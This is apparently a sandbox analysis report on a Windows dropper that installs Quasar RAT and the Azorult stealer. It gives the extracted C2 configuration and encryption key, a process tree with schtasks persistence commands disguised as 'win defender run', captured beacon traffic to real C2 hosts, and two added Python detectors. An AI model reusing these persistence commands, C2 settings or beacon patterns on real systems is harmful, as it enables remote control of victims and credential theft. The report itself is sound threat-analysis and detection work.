Analysis

  • max time kernel
    4s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    06/03/2025, 02:28 UTC

General

  • Target

    eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe

  • Size

    2.0MB

  • MD5

    7888711f3d11f449955d82d767ee9762

  • SHA1

    5fc94a3d3d7aff5884a1732ee796b3f5fdd3364b

  • SHA256

    eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b

  • SHA512

    40d3b9548fb12f0ff0d035c654349d0e849c9715d81f3ae82909214596461247f5832672c2fc0aff30e9e5d329194c554e433fb8642a68635be78c92b4e9733b

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYf:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT

    Quasar is an open-source Remote Access Tool (RAT).

  • Quasar family
  • Quasar payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 13 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
    "C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
          PID:2888
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 160
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:2848
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2392
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3012
        • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2084
      • C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
        "C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:992
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
        2⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2840
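The process tree above shows the two persistence shapes worth alerting on: Quasar's installer (windef.exe, then its copy winsock.exe in %AppData%\SubDir) registering an ONLOGON task named "win defender run" with /rl HIGHEST, and the main sample registering a task that relaunches a binary under the user profile every minute. The following is an added example, not tria.ge output or Quasar code: a small detector that parses schtasks command lines from process-creation events and scores them. The event records, the "user-writable location" regex, the two-signal threshold and the benign control event are assumptions of this example; the three malicious command lines are copied from the tree above.

```python
"""Flag schtasks.exe persistence command lines like those in the process tree above.

Added example (not tria.ge output). The events are constructed from the three
schtasks invocations in the report plus one benign control.
"""
import re
import shlex
from dataclasses import dataclass, field

SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"

# Constructed process-creation events: creating process image and schtasks command line.
SAMPLE_EVENTS = [
    {"pid": 3012, "parent": r"C:\Users\Admin\AppData\Local\Temp\windef.exe",
     "cmdline": r'"schtasks" /create /tn "win defender run" /sc ONLOGON '
                r'/tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f'},
    {"pid": 2084, "parent": r"C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe",
     "cmdline": r'"schtasks" /create /tn "win defender run" /sc ONLOGON '
                r'/tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f'},
    {"pid": 2840, "parent": SAMPLE_EXE,
     "cmdline": r'"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 '
                r'/tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F'},
    # Benign control (constructed): a vendor updater task created by a system process.
    {"pid": 4100, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'schtasks /create /tn "Adobe Acrobat Update Task" '
                r'/tr "C:\Program Files\Adobe\AdobeUpdate.exe" /sc daily /st 12:00'},
]

# Locations an unprivileged user can write to (assumed list). A task whose action,
# or whose creator, lives here is the pattern the Quasar dropper uses above.
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\|[a-z]:\\programdata\\|[a-z]:\\windows\\temp\\"
    r"|%(?:appdata|localappdata|temp|tmp|userprofile)%)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    pid: int
    task_name: str
    action: str
    reasons: list = field(default_factory=list)


def parse_schtasks(cmdline):
    """Split a schtasks command line Windows-style and collect its switches.

    Returns (is_create, options); options maps a lower-cased switch name
    (without the slash) to its argument, or to True for bare switches like /f.
    """
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens:
        return False, {}
    exe = tokens[0].lower()
    if exe not in ("schtasks", "schtasks.exe") and not exe.endswith("\\schtasks.exe"):
        return False, {}
    opts = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[name] = tokens[i + 1]   # switch with an argument, e.g. /tn "name"
                i += 1
            else:
                opts[name] = True            # bare switch, e.g. /f or /create
        i += 1
    return "create" in opts, opts


def assess(event):
    """Return a Finding when the created task looks like malware persistence, else None."""
    is_create, o = parse_schtasks(event["cmdline"])
    if not is_create:
        return None
    action = o.get("tr") if isinstance(o.get("tr"), str) else ""
    schedule = str(o.get("sc", "")).upper()
    reasons = []
    if USER_WRITABLE.match(action):
        reasons.append("task action lives in a user-writable directory")
    if schedule in ("ONLOGON", "ONSTART") and str(o.get("rl", "")).upper() == "HIGHEST":
        reasons.append("runs at logon/startup with /rl HIGHEST")
    if schedule == "MINUTE" and str(o.get("mo", "")) == "1":
        reasons.append("re-executes every minute (/sc minute /mo 1), a relaunch/watchdog pattern")
    if USER_WRITABLE.match(event.get("parent", "")):
        reasons.append("created by a process running from a user-writable directory")
    if "f" in o:
        reasons.append("/f overwrites any existing task of that name without prompting")
    # One weak signal on its own (e.g. /f) is not enough; require two (assumed threshold).
    if len(reasons) < 2:
        return None
    name = o.get("tn") if isinstance(o.get("tn"), str) else ""
    return Finding(event["pid"], name, action, reasons)


def scan(events):
    """Assess every event and keep only the findings."""
    return [f for f in (assess(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"PID {f.pid}: task '{f.task_name}' -> {f.action}")
        for r in f.reasons:
            print("   -", r)
```

Run against the constructed events, the three schtasks lines from this report are flagged and the updater task is not. The parser keeps Windows quoting (shlex in non-POSIX mode, so backslashes are literal), which matters because the task name and action path contain spaces. On a real estate, feed it Sysmon Event ID 1 or Windows 4698 (task created) records rather than a hand-built list.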

    Network

    • DNS (US) ip-api.com, from winsock.exe
      Remote address: 8.8.8.8:53
      Request: ip-api.com IN A
      Response: ip-api.com IN A 208.95.112.1
    • GET (US) http://ip-api.com/json/, from windef.exe
      Remote address: 208.95.112.1:80
      Request:
        GET /json/ HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
        Host: ip-api.com
        Connection: Keep-Alive
      Response:
        HTTP/1.1 200 OK
        Date: Thu, 06 Mar 2025 02:28:22 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 288
        Access-Control-Allow-Origin: *
        X-Ttl: 59
        X-Rl: 40
    • GET (US) http://ip-api.com/json/, from winsock.exe
      Remote address: 208.95.112.1:80
      Request:
        GET /json/ HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
        Host: ip-api.com
        Connection: Keep-Alive
      Response:
        HTTP/1.1 200 OK
        Date: Thu, 06 Mar 2025 02:28:23 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 288
        Access-Control-Allow-Origin: *
        X-Ttl: 58
        X-Rl: 36
    • DNS (US) 0x21.in, from eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address: 8.8.8.8:53
      Request: 0x21.in IN A
      Response: 0x21.in IN A 44.221.84.105
    • POST (US) http://0x21.in:8000/_az/, from eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address: 44.221.84.105:8000
      Request:
        POST /_az/ HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
        Host: 0x21.in:8000
        Content-Length: 97
        Cache-Control: no-cache
      Response:
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 06 Mar 2025 02:28:24 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
        Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
        Set-Cookie: btst=303dbd9df2044d937dcdf6b86f7250c7|212.102.63.147|1741228104|1741228104|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
        Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    • DNS (US) 0x21.in, from eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address: 8.8.8.8:53
      Request: 0x21.in IN A
      Response: 0x21.in IN A 44.221.84.105
    • POST (US) http://0x21.in/_az/, from eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address: 44.221.84.105:8000
      Request:
        POST /_az/ HTTP/1.0
        Host: 0x21.in
        Connection: close
        User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
        Content-Length: 97
      Response:
        HTTP/1.1 200 OK
        Server: nginx
        Date: Thu, 06 Mar 2025 02:28:25 GMT
        Content-Type: text/html
        Connection: close
        Set-Cookie: btst=b3f155569080a2adec974065625a8fe3|212.102.63.147|1741228105|1741228105|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
        Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Connections (bytes and packets are sent / received; sample.exe stands for eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe)

    Destination         Domain / URL               Proto  Process      Bytes           Packets  Request -> Status
    208.95.112.1:80     http://ip-api.com/json/    http   windef.exe   328 B / 557 B   4 / 2    GET /json/ -> 200
    208.95.112.1:80     http://ip-api.com/json/    http   winsock.exe  374 B / 557 B   5 / 2    GET /json/ -> 200
    44.221.84.105:8000  http://0x21.in:8000/_az/   http   sample.exe   480 B / 870 B   5 / 5    POST /_az/ -> 200
    44.221.84.105:8000  http://0x21.in/_az/        http   sample.exe   469 B / 590 B   5 / 5    POST /_az/ -> 200
    5.8.88.191:443      (Quasar C2 from config)    -      winsock.exe  152 B / -       3 / -    no reply recorded
    8.8.8.8:53          ip-api.com                 dns    winsock.exe  56 B / 72 B     1 / 1    A ip-api.com -> 208.95.112.1
    8.8.8.8:53          0x21.in                    dns    sample.exe   53 B / 69 B     1 / 1    A 0x21.in -> 44.221.84.105
    8.8.8.8:53          0x21.in                    dns    sample.exe   53 B / 69 B     1 / 1    A 0x21.in -> 44.221.84.105
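Two things in the HTTP traffic above are detectable without any IP or domain list: the Quasar modules query ip-api.com with a hard-coded Firefox/48 User-Agent that claims Windows NT 6.3 (Windows 8.1) while the sandbox is Windows 7 (NT 6.1), and the Azorult beacon is a POST to /_az/ on port 8000 with a "MSIE 6.0b; Windows NT 5.1" User-Agent. The following is an added example, not tria.ge output or code from either family: it scores per-process HTTP events against four rules (external-IP lookup from a non-browser, User-Agent OS claim inconsistent with the real host OS, POST with an MSIE 6 string, plain HTTP on a non-standard port). The event schema, the lists of IP-lookup services and browser image names, and the benign control event are assumptions of this example; the four malicious requests are copied from the Network section.

```python
"""Score HTTP events for the recon/C2 indicators seen in the Network section above.

Added example (not tria.ge output). The events are constructed from the
requests in the report plus one benign browser request; the host is taken to be
Windows 7 (NT 6.1), matching the sandbox platform.
"""
import re
from dataclasses import dataclass, field

SAMPLE_EXE = "eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"
QUASAR_UA = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0"
AZORULT_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"

# Constructed per-process HTTP events (as an EDR or proxy with process attribution would log them).
SAMPLE_EVENTS = [
    {"process": "windef.exe", "method": "GET", "host": "ip-api.com", "port": 80,
     "path": "/json/", "version": "HTTP/1.1", "user_agent": QUASAR_UA},
    {"process": "winsock.exe", "method": "GET", "host": "ip-api.com", "port": 80,
     "path": "/json/", "version": "HTTP/1.1", "user_agent": QUASAR_UA},
    {"process": SAMPLE_EXE, "method": "POST", "host": "0x21.in:8000", "port": 8000,
     "path": "/_az/", "version": "HTTP/1.1", "user_agent": AZORULT_UA, "content_length": 97},
    {"process": SAMPLE_EXE, "method": "POST", "host": "0x21.in", "port": 8000,
     "path": "/_az/", "version": "HTTP/1.0", "user_agent": AZORULT_UA, "content_length": 97},
    # Benign control (constructed): a browser on the same Windows 7 host.
    {"process": "firefox.exe", "method": "GET", "host": "example.com", "port": 443,
     "path": "/", "version": "HTTP/1.1",
     "user_agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0"},
]

# Public "what is my IP" services (assumed list; ip-api.com is the one used in this report).
IP_LOOKUP_HOSTS = {"ip-api.com", "api.ipify.org", "ifconfig.me", "icanhazip.com",
                   "checkip.amazonaws.com"}
# Image names treated as browsers (assumed list); their UA strings are not compared to the host OS.
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
NT_VERSIONS = {"5.1": "Windows XP", "6.1": "Windows 7", "6.2": "Windows 8",
               "6.3": "Windows 8.1", "10.0": "Windows 10/11"}
UA_NT = re.compile(r"Windows NT (\d+\.\d+)")


@dataclass
class Hit:
    index: int
    process: str
    url: str
    rules: list = field(default_factory=list)


def nt_name(version):
    return NT_VERSIONS.get(version, "NT " + version)


def assess_http(index, ev, host_nt="6.1"):
    """Apply the indicator rules to one event; host_nt is the endpoint's real NT version."""
    host = ev["host"].split(":")[0].lower()
    ua = ev.get("user_agent", "")
    is_browser = ev["process"].lower() in BROWSERS
    rules = []
    if host in IP_LOOKUP_HOSTS and not is_browser:
        rules.append("external-IP lookup from a non-browser process")
    m = UA_NT.search(ua)
    # Browsers freeze or reduce the NT token, so only non-browser UAs are checked against the host.
    if m and not is_browser and m.group(1) != host_nt:
        rules.append(f"User-Agent claims {nt_name(m.group(1))} but host runs {nt_name(host_nt)}")
    if ev["method"] == "POST" and "MSIE 6" in ua:
        rules.append("POST with an MSIE 6 User-Agent (a 2001-era browser string; Azorult beacon style)")
    if ev["port"] not in (80, 443, 8080):
        rules.append(f"plain HTTP on non-standard port {ev['port']}")
    if not rules:
        return None
    return Hit(index, ev["process"], f"http://{ev['host']}{ev['path']}", rules)


def scan_http(events, host_nt="6.1"):
    """Assess every event and keep only the hits."""
    return [h for h in (assess_http(i, e, host_nt) for i, e in enumerate(events)) if h]


if __name__ == "__main__":
    for h in scan_http(SAMPLE_EVENTS):
        print(f"[{h.index}] {h.process} -> {h.url}")
        for r in h.rules:
            print("   -", r)
```

Both ip-api.com requests trigger the lookup and OS-mismatch rules, both Azorult POSTs trigger the mismatch, MSIE 6 and port rules, and the Firefox request triggers nothing. The OS-mismatch rule needs the host's real OS version from inventory or the EDR event itself; it is deliberately skipped for browser processes because modern browsers freeze the "Windows NT" token in their User-Agent regardless of the actual OS.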

    MITRE ATT&CK Enterprise v15


    Downloads

    • \Users\Admin\AppData\Local\Temp\vnc.exe

      Filesize

      405KB

      MD5

      b8ba87ee4c3fc085a2fed0d839aadce1

      SHA1

      b3a2e3256406330e8b1779199bb2b9865122d766

      SHA256

      4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

      SHA512

      7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

    • \Users\Admin\AppData\Local\Temp\windef.exe

      Filesize

      349KB

      MD5

      b4a202e03d4135484d0e730173abcc72

      SHA1

      01b30014545ea526c15a60931d676f9392ea0c70

      SHA256

      7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

      SHA512

      632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

    • memory/992-39-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/992-43-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/992-33-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/992-31-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/2252-30-0x0000000000840000-0x0000000000841000-memory.dmp

      Filesize

      4KB

    • memory/2392-46-0x0000000000950000-0x00000000009AE000-memory.dmp

      Filesize

      376KB

    • memory/2508-58-0x0000000000F00000-0x0000000000F5E000-memory.dmp

      Filesize

      376KB
